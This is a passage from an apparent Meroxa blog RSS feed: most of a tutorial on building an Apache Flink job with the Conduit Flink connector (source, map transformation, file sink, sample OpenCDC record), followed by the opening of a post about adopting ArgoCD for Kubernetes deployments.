&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;dependencies&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, write the main class and get a new execution environment for your Flink job:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;java&quot;&gt;&lt;pre class=&quot;language-java&quot;&gt;&lt;code class=&quot;language-java&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; env &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;StreamExecutionEnvironment&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;getExecutionEnvironment&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Adding a Source&lt;/h3&gt;
&lt;p&gt;Each Conduit source in an Apache Flink job maps to a connector on a running Conduit instance. In the &lt;code class=&quot;language-text&quot;&gt;conduit-flink-connector&lt;/code&gt;, this is represented with &lt;code class=&quot;language-text&quot;&gt;io.conduit.flink.ConduitSource&lt;/code&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;java&quot;&gt;&lt;pre class=&quot;language-java&quot;&gt;&lt;code class=&quot;language-java&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// (1) Used to correlate all the pipelines which are part of this app&lt;/span&gt;
&lt;span class=&quot;token class-name&quot;&gt;String&lt;/span&gt; appId &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;conduit-flink-demo&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;// (2) Create a new Conduit source&lt;/span&gt;
&lt;span class=&quot;token class-name&quot;&gt;KafkaSource&lt;/span&gt;&lt;span class=&quot;token generics&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;ConduitSource&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
   appId&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token comment&quot;&gt;// (3) Specify the plugin&lt;/span&gt;
   &lt;span class=&quot;token string&quot;&gt;&quot;generator&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token comment&quot;&gt;// (4) Configure the plugin&lt;/span&gt;
   &lt;span class=&quot;token class-name&quot;&gt;Map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;of&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;recordCount&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;format.type&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;structured&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;format.options.id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;int&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;format.options.name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;string&quot;&lt;/span&gt;
   &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
   &lt;span class=&quot;token comment&quot;&gt;// (5) Build a KafkaSource instance&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;buildKafkaSource&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Breaking It Down&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Application ID&lt;/strong&gt;: Specifies an ID for the Flink job. The Conduit connector uses this ID as part of the Conduit pipeline IDs it creates.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Create ConduitSource&lt;/strong&gt;: Instantiates a new &lt;strong&gt;ConduitSource&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Specify Connector&lt;/strong&gt;: Choose the &lt;a href=&quot;https://conduit.io/docs/connectors/getting-started&quot;&gt;Conduit connector&lt;/a&gt; to be used. Conduit comes with a few built-in connectors, and &lt;a href=&quot;https://conduit.io/docs/connectors/installing&quot;&gt;additional can be installed&lt;/a&gt;. In this case, the built-in &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;generator connector&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Configure Connector&lt;/strong&gt;: A connector’s configuration is usually part of the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator?tab=readme-ov-file#configuration&quot;&gt;README&lt;/a&gt;.  The configuration we have will make the connector produce one record, that has a structured payload, with two fields: an ID and a name.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Build KafkaSource&lt;/strong&gt;: Builds the &lt;strong&gt;KafkaSource&lt;/strong&gt; instance.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Writing a Map Transformation&lt;/h3&gt;
&lt;p&gt;Create a &lt;code class=&quot;language-text&quot;&gt;DataStream&lt;/code&gt; and add a map transformation to it. The transformation accepts an &lt;code class=&quot;language-text&quot;&gt;io.conduit.opencdc.Record&lt;/code&gt; and returns an &lt;code class=&quot;language-text&quot;&gt;io.conduit.opencdc.Record&lt;/code&gt;. Here, we add metadata to each record:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;java&quot;&gt;&lt;pre class=&quot;language-java&quot;&gt;&lt;code class=&quot;language-java&quot;&gt;&lt;span class=&quot;token class-name&quot;&gt;DataStream&lt;/span&gt;&lt;span class=&quot;token generics&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt; in &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;fromSource&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
     source&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token class-name&quot;&gt;WatermarkStrategy&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;noWatermarks&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;generator-source&quot;&lt;/span&gt;
   &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;MapFunction&lt;/span&gt;&lt;span class=&quot;token generics&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; value &lt;span class=&quot;token operator&quot;&gt;-&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
     value&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;getMetadata&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;put&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;processed-by&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;flink&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
     &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; value&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
   &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Adding a Sink&lt;/h3&gt;
&lt;p&gt;Now, write the data into a file:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;java&quot;&gt;&lt;pre class=&quot;language-java&quot;&gt;&lt;code class=&quot;language-java&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; sink &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;ConduitSink&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
   appId&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token string&quot;&gt;&quot;file&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token class-name&quot;&gt;Map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;of&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;path&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;/tmp/file-destination.txt&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;buildKafkaSink&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Connect and Execute&lt;/h3&gt;
&lt;p&gt;Connect the stream and trigger program execution:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;java&quot;&gt;&lt;pre class=&quot;language-java&quot;&gt;&lt;code class=&quot;language-java&quot;&gt;in&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;sinkTo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;sink&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;execute&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Conduit + Apache Flink demo&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Putting It All Together&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;java&quot;&gt;&lt;pre class=&quot;language-java&quot;&gt;&lt;code class=&quot;language-java&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; env &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;StreamExecutionEnvironment&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;getExecutionEnvironment&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token class-name&quot;&gt;String&lt;/span&gt; appId &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;conduit-flink-demo&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token class-name&quot;&gt;KafkaSource&lt;/span&gt;&lt;span class=&quot;token generics&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;ConduitSource&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
   appId&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token string&quot;&gt;&quot;generator&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token class-name&quot;&gt;Map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;of&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;recordCount&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;format.type&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;structured&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;format.options.id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;int&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
     &lt;span class=&quot;token string&quot;&gt;&quot;format.options.name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;string&quot;&lt;/span&gt;
   &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;buildKafkaSource&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

&lt;span class=&quot;token class-name&quot;&gt;DataStream&lt;/span&gt;&lt;span class=&quot;token generics&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt; in &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;fromSource&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
   source&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token class-name&quot;&gt;WatermarkStrategy&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;noWatermarks&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token string&quot;&gt;&quot;generator-source&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;MapFunction&lt;/span&gt;&lt;span class=&quot;token generics&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;Record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; value &lt;span class=&quot;token operator&quot;&gt;-&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
   value&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;getMetadata&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;put&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;processed-by&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;flink&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
   &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; value&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; sink &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;ConduitSink&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
   appId&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token string&quot;&gt;&quot;file&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token class-name&quot;&gt;Map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;of&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;path&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;/tmp/file-destination.txt&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;buildKafkaSink&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

in&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;sinkTo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;sink&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
env&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;execute&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Conduit + Apache Flink demo&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ensure that Conduit and Kafka are running before executing the job. Running the application will generate the following records:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;position&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;eyJHcm91cElEIjoiNTU0MTU0NTktOTQ5Ny00OWYyLTgzMGUtMjUyY2EwOTE4YTY5IiwiVG9waWMiOiJmbGluay10b3BpYy1zaW5rIiwiUGFydGl0aW9uIjowLCJPZmZzZXQiOjB9&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;operation&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;create&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;metadata&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;

  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;key&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;

  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;

  	&lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;3758801242992936400&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  	&lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;petrifier&quot;&lt;/span&gt;

  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;What we see is a typical OpenCDC record. The  &lt;strong&gt;.Payload.After&lt;/strong&gt;  field contains an id and a &lt;strong&gt;name&lt;/strong&gt; that were created in the generator connector. Looking at the metadata, you’ll notice &lt;strong&gt;&quot;processed-by&quot;&lt;/strong&gt;: &lt;strong&gt;&quot;flink&quot;&lt;/strong&gt; that comes from the map function.&lt;/p&gt;
&lt;h3&gt;Next Steps&lt;/h3&gt;
&lt;p&gt;Examine the topics used (&lt;strong&gt;flink-topic-source&lt;/strong&gt; and &lt;strong&gt;flink-topic-sink&lt;/strong&gt;), modify the map transformation, and observe the updated results. For &lt;a href=&quot;https://github.com/conduitio-labs/conduit-flink-connector/tree/main/src/main/java/examples&quot;&gt;more examples&lt;/a&gt;, including PostgreSQL to Snowflake, visit our GitHub repository.&lt;/p&gt;
&lt;p&gt;We&apos;d love to hear your feedback on the connector. Join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt;, &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions/&quot;&gt;GitHub Discussions&lt;/a&gt;, or &lt;a href=&quot;https://x.com/conduitio&quot;&gt;Twitter/X&lt;/a&gt; for more conversations!
Also, don&apos;t forget to &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme?__hstc=259081301.6d5dc5950702ea18243d5eabeaba6872.1701109351374.1717020067958.1717083419376.75&amp;#x26;__hssc=259081301.2.1717083419376&amp;#x26;__hsfp=3065315178&quot;&gt;request a demo&lt;/a&gt; to learn about our new Conduit Platform!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Simplifying Kubernetes Deployments with ArgoCD]]></title><description><![CDATA[At Meroxa, we recently adopted ArgoCD as our go-to continuous delivery (CD) tool, allowing us to easily leverage the GitOps framework to deploy Kubernetes resources and services. We utilize ArgoCD to simplify the management of tenant instances of our platform, deployed within a Kubernetes cluster.
]]></description><link>https://meroxa.com/blog/simplifying-kubernetes-deployments-with-argocd</link><guid isPermaLink="false">https://meroxa.com/blog/simplifying-kubernetes-deployments-with-argocd</guid><dc:creator><![CDATA[Samir Ketema]]></dc:creator><pubDate>Mon, 10 Jun 2024 10:00:00 GMT</pubDate><content:encoded>&lt;p&gt;At Meroxa, we recently adopted &lt;a href=&quot;https://argo-cd.readthedocs.io/en/stable/&quot;&gt;ArgoCD&lt;/a&gt; as our go-to continuous delivery (CD) tool, allowing us to easily leverage the &lt;a href=&quot;https://about.gitlab.com/topics/gitops/&quot;&gt;GitOps&lt;/a&gt; framework to deploy Kubernetes resources and services. We utilize ArgoCD to simplify the management of tenant instances of our platform, deployed within a Kubernetes cluster.
